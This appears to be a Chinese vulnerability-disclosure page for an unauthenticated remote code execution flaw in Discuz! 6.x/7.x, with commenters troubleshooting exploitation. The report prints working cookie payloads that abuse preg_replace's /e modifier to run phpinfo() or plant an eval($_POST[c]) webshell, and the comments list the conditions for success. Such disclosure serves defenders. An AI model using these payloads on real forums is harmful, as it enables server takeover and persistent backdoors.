漏洞概要
关注数(24)
关注此漏洞
漏洞标题:Discuz!某两个版本前台产品命令执行(无需登录)
提交时间:2014-10-25 17:02
修复时间:2015-01-23 17:04
公开时间:2015-01-23 17:04
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-10-25: 细节已通知厂商并且等待厂商处理中
2014-10-27: 厂商已经确认,细节仅向厂商公开
2014-10-30: 细节向第三方安全合作伙伴开放
2014-12-21: 细节向核心白帽子及相关领域专家公开
2014-12-31: 细节向普通白帽子公开
2015-01-10: 细节向实习白帽子公开
2015-01-23: 细节向公众公开
简要描述:
最近总有人翻旧程序,我也翻一个出来!
Discuz!某版本虽然停止维护,但使用量还很可观,各大厂商或多或少都有使用。
有条件,直接存在命令执行,但目前大多默认配置直接支持。
此漏洞在互联网上公开过,但厂商不认为是漏洞?
还是那句:没有POC,你说个jb!
不登陆,直接执行
详细说明:
影响版本:Discuz! 6.x/7.x 全局变量防御绕过漏洞
互联网比较有人公开过,看:http://www.80vul.com/dzvul/sodb/19/sodb-2010-01.txt
那时描述是:Discuz! 6.x/7.x 全局变量防御绕过漏洞 POC : 缺
可能由于作者没有放出POC,因此没有得到别人重视。
此漏洞利用的地方有很多,不限制这个命令执行。
漏洞原理就不说了,这里说说漏洞利用:
文件:
include/discuzcode.func.php
注意到 119 行:
$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
因此,直接cookie中带
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
即可执行。
请求中Cookie带
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B;
即一句话木马,此后门漏洞十分隐蔽,不容易发现。
随便 google 验证了一下,发现还是有大量中招的。
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-10-27 09:22
厂商回复:
感谢您的支持。我们尽快处理。
最新状态:
暂无
漏洞评价:
评论
-
2014-10-25 17:08 |
c0nt ( 路人 | Rank:1 漏洞数:7 )
-
2014-10-25 17:08 |
风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)
-
2014-10-25 17:12 |
if、so 
( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)
-
2014-10-25 17:25 |
泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)
-
2014-10-25 17:40 |
卡卡 ( 普通白帽子 | Rank:447 漏洞数:52 | <script>alert('安全团队长期招人')</scrip...)
-
2014-10-25 17:45 |
咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )
-
2014-10-25 17:55 |
zeracker 
( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)
-
2014-10-25 17:58 |
ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)
-
2014-10-25 18:06 |
子非海绵宝宝 
( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
-
2014-10-25 18:13 |
贫道来自河北 ( 普通白帽子 | Rank:1395 漏洞数:423 | 一个立志要把乌云集市变成零食店的男人)
-
2014-10-25 18:31 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
-
2014-10-25 18:35 |
phith0n 
( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)
-
2014-10-25 19:25 |
老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)
-
2014-10-25 19:29 |
Cyrils ( 实习白帽子 | Rank:45 漏洞数:10 | the more the better)
-
2014-10-25 19:54 |
浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)
-
2014-10-25 20:42 |
gainover 
( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
-
2014-10-25 20:49 |
猪猪侠 
( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)
-
2014-10-25 20:55 |
雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
-
2014-10-25 21:15 |
gainover 
( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
-
2014-10-25 21:53 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2014-10-25 21:57 |
backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)
-
2014-10-25 21:57 |
梧桐雨 
( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
-
2014-10-25 22:02 |
nextdoor ( 普通白帽子 | Rank:325 漏洞数:74 )
-
2014-10-25 22:06 |
Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)
-
2014-10-25 22:22 |
Woodee ( 路人 | 还没有发布任何漏洞 | 乌云路人甲,打脸pa pa pa)
-
2014-10-25 22:59 |
盛大网络(乌云厂商)
-
2014-10-25 23:03 |
咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )
-
2014-10-25 23:04 |
p4ssw0rd ( 普通白帽子 | Rank:306 漏洞数:92 | 不作死就不会死)
-
2014-10-25 23:09 |
大亮 ( 普通白帽子 | Rank:306 漏洞数:65 | 慢慢挖洞)
-
2014-10-25 23:24 |
erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)
-
2014-10-27 09:42 |
冰锋刺客 ( 普通白帽子 | Rank:113 漏洞数:14 | 请在监护人陪同下与本人交流)
-
2014-10-27 12:16 |
老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)
@M4sk 普通白帽子 | Rank:610 漏洞数:202 | QQ276916312这么高调
-
2014-10-27 12:47 |
M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)
-
2014-10-28 10:02 |
iproute ( 路人 | Rank:4 漏洞数:1 | 为路由器生,为交换机死,为Ping通奋斗一辈...)
-
2014-10-28 10:32 |
G8dSnow ( 路人 | Rank:21 漏洞数:5 | 一直在学习技术、分享知识的路上)
-
2014-10-28 14:53 |
啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)
-
2014-10-31 08:49 |
茜茜公主 ( 普通白帽子 | Rank:2360 漏洞数:406 | 家里二宝出生,这几个月忙着把屎把尿...忒...)
-
2014-10-31 16:40 |
消逝文字 ( 路人 | Rank:3 漏洞数:2 | 永久的菜鸟一枚)
-
2014-11-01 10:46 |
一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)
-
2014-11-01 15:52 |
老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)
卧槽啊,20rank+精华+3000rmb。逆天逆大发了@finger
-
2014-11-01 16:10 |
风情万种 ( 普通白帽子 | Rank:181 漏洞数:63 | 不再相信爱了)
-
2014-11-01 16:37 |
老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)
-
2014-11-02 19:12 |
Mxx ( 路人 | Rank:0 漏洞数:2 | 没有)
-
2014-11-03 13:49 |
ztaosony ( 路人 | Rank:0 漏洞数:1 | 终于来到这个搞基的圣地,我很激动)
-
2014-11-14 21:12 |
ddy ( 实习白帽子 | Rank:44 漏洞数:16 | 其实第一次要我挖洞我是拒绝的。因为,你不...)
提醒:为保证通用型安全漏洞的信息保密性,该漏洞无法使用乌云币提前查看,请踏实的杀洞升级吧
-
2014-12-10 17:32 |
灬相随灬 ( 普通白帽子 | Rank:369 漏洞数:68 | 大胆天下去得,小心寸步难行。)
-
2014-12-10 18:28 |
zph ( 普通白帽子 | Rank:235 漏洞数:43 )
-
2014-12-11 06:52 |
小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)
-
2014-12-28 17:01 |
goubuli ( 普通白帽子 | Rank:324 漏洞数:61 )
-
2015-01-06 23:40 |
huotoo ( 路人 | Rank:20 漏洞数:3 | 努力学习中)
@JannockRequest tainting attempted. 返回这个就是补漏洞了吧?
-
2015-01-07 00:23 |
winalva ( 路人 | Rank:9 漏洞数:3 | rank是什么?)
@huotoo 怎么利用。。。添加了2条cookie刷新没反应
-
2015-01-23 18:21 |
xiaoxin ( 实习白帽子 | Rank:72 漏洞数:16 | 无)
@winalva 分站点,试试打码的图片最后一条是可以的
-
2015-01-23 21:40 |
sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)
Request tainting attempted....
-
2015-01-23 22:15 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
说出现Request tainting attempted你们有没有仔细看啊,利用前提是php request_order为GP
-
2015-01-23 22:50 |
BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)
-
2015-01-23 23:20 |
sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)
安全参考写的挺好的,不过还是没测试成功,不是被拦截了,就是非GP:Discuz 6.x/7.x 代码执行漏洞触发条件:1 URL连接中的帖子或评论必须带有表情(没有自己去回复)2 php>5.3.x 且 request_order值为GP (默认值为GP)3 后台--帖子内容页---最大单一表情解析次数: 为04 第2次提交Cookie,若没成功,请在浏览框里右键刷新
-
2015-01-26 00:26 |
CH’s Alert ( 路人 | Rank:6 漏洞数:3 | 惹我之人定不赦,持剑斗破苍穹笑。剑指...)
-
2015-01-26 00:31 |
CH’s Alert ( 路人 | Rank:6 漏洞数:3 | 惹我之人定不赦,持剑斗破苍穹笑。剑指...)
-
2015-01-26 20:57 |
秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
-
2015-01-26 21:57 |
发条橙子 ( 路人 | Rank:19 漏洞数:6 | ∑(っ °Д °;)っ)
-
2015-01-26 23:12 |
sin ( 实习白帽子 | Rank:38 漏洞数:2 | 寻找最优雅的解决方案)
@发条橙子 dz的用户列表如何获取到的额?像猪猪侠那样?搜索引擎只有1000条吧
-
2015-01-29 17:25 |
S4b0r ( 路人 | Rank:18 漏洞数:2 | ````````)
-
2015-04-11 23:21 |
Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)
-
2015-07-31 09:28 |
suolong ( 实习白帽子 | Rank:47 漏洞数:11 | 我有个野心,就是要成为世界第一的贱士!!)
-
2015-07-31 13:46 |
小杰哥 ( 普通白帽子 | Rank:155 漏洞数:25 | 逆水行舟,不进则退。)
找了几个 基本都是受request_order限制.... 暂时没有找到成功的.................